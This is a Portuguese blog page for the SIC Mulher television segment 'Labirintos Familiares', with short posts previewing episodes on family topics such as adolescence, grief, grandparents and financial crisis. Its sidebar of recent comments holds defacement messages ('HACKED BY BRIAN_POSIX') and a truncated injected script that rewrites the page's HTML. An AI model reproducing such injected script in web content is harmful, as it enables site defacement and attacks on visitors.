Labirintos Familiares @ 11:33

Sex, 20/07/12

Quando falamos de filhos adolescentes, não raras vezes ouvimos falar de riscos, discussões e afastamento. Sendo a adolescência a passagem para a vida adulta, esta implica sempre uma reorganização familiar, mas também um reajustar na vida de cada um dos elementos da família. Novos interesses, novos amigos. O filho que deixou de ser pequenino, procura agora a sua autonomia, ao mesmo tempo que precisa do apoio e amor incondicional dos pais. Mudanças, ambivalências e movimentos de entrada e saída do seio da família que potenciam um turbilhão, muitas vezes catalisador de um novo equilíbrio.

Na próxima rubrica dos Labirintos Familiares, iremos falar sobre as transformações familiares com filhos adolescentes. Não perca! 2ª feira às 17h30, na SIC Mulher.




Labirintos Familiares @ 18:31

Qui, 14/06/12

Perante o diagnóstico de doença mental num elemento da família, são muitas as questões e medos que surgem. Se durante algum tempo o comportamento alterado do familiar foi sendo explicado por excesso de trabalho, feitio ou tristeza com dado acontecimento, o momento de encarar a realidade implica um reajustar da própria identidade familiar. O que muda? Que perspetivas de vida? A quem recorrer? E se a pessoa não quer ajuda? Perdemos o nosso filho/irmã/pai? Que esperança podemos ter? Que adaptação poderá a família fazer perante esta crise?

Na próxima rubrica dos Labirintos Familiares, iremos falar sobre a realidade de tantas famílias que se deparam com um diagnóstico de doença mental. Falaremos sobre as dúvidas de muitos e as possibilidades existentes – vivências de muitas famílias que diariamente se transcendem na luta pelo bem-estar e qualidade de vida, alimentando o amor incondicional que mantém estes laços tão privilegiados.

Não perca! 2ª feira às 17h30, na SIC Mulher.




Labirintos Familiares @ 18:33

Sex, 18/05/12

Quantas vezes ouvimos as expressões “Estás a estraga-la com mimos”, “ele precisa é de regras!”, “Há
quanto tempo não me dás um abraço?”, “Porque é que tem de ser tudo à tua maneira?”.

De facto, mimos e regras fazem parte da teia relacional e afetiva que é Ser Família. Em muitas casas, é com o crescimento dos pequenotes que estas começam a ser desafiadas e questionadas. A forma como se partilha os afetos e estabelece regras, porém, está em constante mudança e acontece em todas as casas com ou sem crianças.

Qual a melhor forma de lidar com esta dança de mimos e regras? Serão
compatíveis? Em que medida nos podem ajudar a ter um quotidiano mais positivo em família?

 

Descubra todas as respostas, na nossa rubrica "labirintos Familiares", com Catarina Rivero.




Labirintos Familiares @ 19:06

Sex, 27/04/12

Cada vez há em Portugal mais jovens adultos que optam por viver temporariamente a sua vida de solteiro de forma autónoma. Em casa própria ou partilhada com amigos, esta é uma fase que permite a consciência de si e uma redefinição da relação com a família de origem. Por vezes, esta “fase” é prolongada no tempo, por circunstâncias ou opção, ficando o jovem solteiro por mais tempo do que a sua expectativa inicial. Se para muitos, viver solteiro é experienciado com alegria e satisfação, noutros casos são sentidas as pressões da família e sociedade, mas também do próprio, bem como algum isolamento quando “todos” os amigos seguem o percurso para uma vivência conjugal. Quando a condição de solteiro não é uma opção, pode trazer algum mal-estar, à medida que os anos passam.

Quais os principais desafios de viver solteiro? Como são encarados os solteiros pelas suas famílias?

Na próxima rubrica dos Labirintos Familiares, iremos falar sobre a vida de solteiros: os que aguardam alguém especial e os que assim escolheram. Falaremos sobre o suporte e/ou pressões da família, as aspirações de todos e possibilidades para uma dinâmica familiar positiva e inclusiva. Não perca!






Labirintos Familiares @ 18:32

Qui, 22/03/12

Em todas as famílias existem momentos de maior proximidade e abertura e outra maior tensão ou conflito. Por vezes, sentimos que as fases de tensão se tornam mais regulares em virtude de tudo o que há para fazer no dia-a-dia, na rotina das exigências diárias. Cada vez mais estudos nos vêm lembrar de como as famílias que riem em conjunto, que têm espírito de brincadeira e diversão, tendem a resolver mais facilmente as suas divergências e ultrapassar momentos difíceis. Permite a todos ganhar perspetiva e aceitar as diferenças… com humor.

Como cultivar o sentido de humor familiar? Como transformar um eventual cinzentismo numa dinâmica familiar com mais cor e diversão? A sua família diverte-se em conjunto? Porque pode ser útil esta forma de estar e relacionar? Estas e outras questões estarão na base da reflexão da próxima rubrica dos Labirintos Familiares. Participe!




Labirintos Familiares @ 18:34

Qui, 23/02/12

A morte de alguém que nos é querido traz uma dor profunda e cada um de nós reage e vive esta dor de um modo e num tempo específicos. Quando as pessoas morrem, não voltam. Encarar esta realidade é uma tarefa do processo de luto e um desafio à gestão das nossas emoções.

No turbilhão que tantas vezes acontece, as mudanças familiares acontecem: é preciso conjugar diferentes formas de lidar com a dor, dar espaço e comunicar para a reorganização familiar e para que a harmonia se mantenha entre todos, reencontrando um sentido comum para a perda, no entrelaçar dos percursos individuais deste processo de dizer Adeus.

Na próxima rubrica dos Labirintos Familiares, iremos refletir sobre o impacto da morte de um familiar na dinâmica relacional dos que ficam. Quais os maiores desafios e riscos? Como reforçar o sentido de família num momento de tanta dor? Que estratégias para dar espaço e tempo a cada um, mantendo a dinâmica familiar?  Serão algumas das questões abordadas na próxima rubrica.




Labirintos Familiares @ 18:35

Sex, 27/01/12

São muitas as mudanças da sociedade atual, com maior longevidade (e qualidade de vida!), mais tecnologia, mais correria dos pais… mas a magia  afetiva dos avós continua a acontecer. São eles que ajudam muitas vezes os pais, tomando conta dos netos, apoiando financeiramente, ou tão só procurando mediar. Por vezes há divergências, conflitos de lealdades, criticas e “arrufos” mas quando a relação entre avós e netos é bem semeada, fica um amor e uma cumplicidade tantas vezes relatada por crianças, adolescentes e jovens adultos. Fica muitas vezes o porto seguro de um amor incondicional, de partilha de valores, histórias de família, aprendizagens conjuntas.

Que dilemas vivem os avós de hoje? Qual o seu papel? Como tornar estas relações avós-netos inesquecíveis? Como gerir a sua vontade de ajudar e a necessidade dos pais de se afirmarem enquanto educadores? Na próxima 2ª feira, iremos falar sobre a relação dos avós com os netos e os filhos.

 

Junte-se a nós para mais uma reflexão nos Labirintos Familiares!






Labirintos Familiares @ 13:33

Dom, 01/01/12

Todas as famílias, ao longo do seu percurso, lidam com desafios e crises variadas: dependência de um familiar mais velho, dificuldades financeiras, doença crónica de um filho ou conjuge, divórcio, morte de um familiar chegado, desemprego, emigração,, entre outros. Se para muitos tal é o princípio de um sentimento de desestruturação familiar com mais conflitos e afastamento, afirmando que “não há nada a fazer”, são muitas as famílias que, em conjunto, mantêm a esperança e renovam o  sentido de Família.

 

Frequentemente encontramos famílias que referem uma maior aproximação e entreajuda, face a uma ou múltiplas dificuldades: são as famílias que acreditam que são capazes de superar obstáculos e encontrar soluções e que sentem que se fortaleceram num período mais difícil das suas vidas. O que diferencia estas famílias? Como nos podemos inspirar e aumentar (ou manter) a nossa capacidade de lidar com os desafios, protegendo a harmonia familiar?

 

Na próxima 2ª feira, às 17h30, falaremos sobre Resiliência Familiar e possibilidades para lidarmos e nos fortalecermos enquanto famílias perante eventuais adversidades. Junte-se a nós para um novo ano de relações positivas!




Labirintos Familiares @ 18:33

Qui, 10/11/11

Em plena crise, são muitas as famílias que se deparam com constrangimentos financeiros. Menos compras ou restaurantes, férias mais económicas, mudança de escolas, segundos carros vendidos e mesmo filhos adultos que regressam a casa dos pais, são algumas das muitas medidas adoptadas por diferentes famílias. Em muitas casas, o final do mês passou a ser uma interrogação quanto ao pagamento das despesas. Noutras casas, as contas estão asseguradas, mas está a ser difícil abdicar de um estilo de vida… que implicações tem esta nova realidade para a dinâmica familiar? Se muitas famílias sentem tensão a aumentar, com mais conflitos e irritabilidade, ausências e silêncios, outras famílias procuram soluções conjuntas, partilham a tristeza e apoiam-se nas possibilidades e alternativas. O impacto é muitas vezes percebido na relação conjugal, mas também na relação com os filhos e, naturalmente, no bem-estar de todos. Fica o convite para a próxima 2ª feira, com mais uma rubrica dos Labirintos Familiares: A conversa será em torno do impacto da crise nas famílias, com algumas pistas para que esta seja uma oportunidade bem aproveitada para estreitar laços e reforçar o sentido de Ser Família.




Labirintos Familiares @ 17:54

Sex, 21/10/11

 

A Internet entrou na vida das famílias e em particular dos casais.  As rotinas passam cada vez mais por algumas horas ao computador, entre trabalho, e-mails, informação e Redes Sociais. A dinâmica altera-se e não raras vezes há queixas nas consultas de Terapia Conjugal com o tempo dedicado à internet pelo outro. São ainda muitos os casais que referem situações de infidelidade online, e os ex-casais que consideram que o seu divórcio foi consequência das redes sociais.

 

Será que a internet tem o poder de invadir e transformar a vida conjugal? Que desafios para os casais na era das Redes Sociais? Será a realidade virtual uma ameaça à Conjugalidade? Na próxima rubrica dos Labirintos Familiares iremos reflectir sobre como a internet e as redes sociais estão a alterar o quotidiano dos casais. Participe!

 



Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
subscrever feeds
blogs SAPO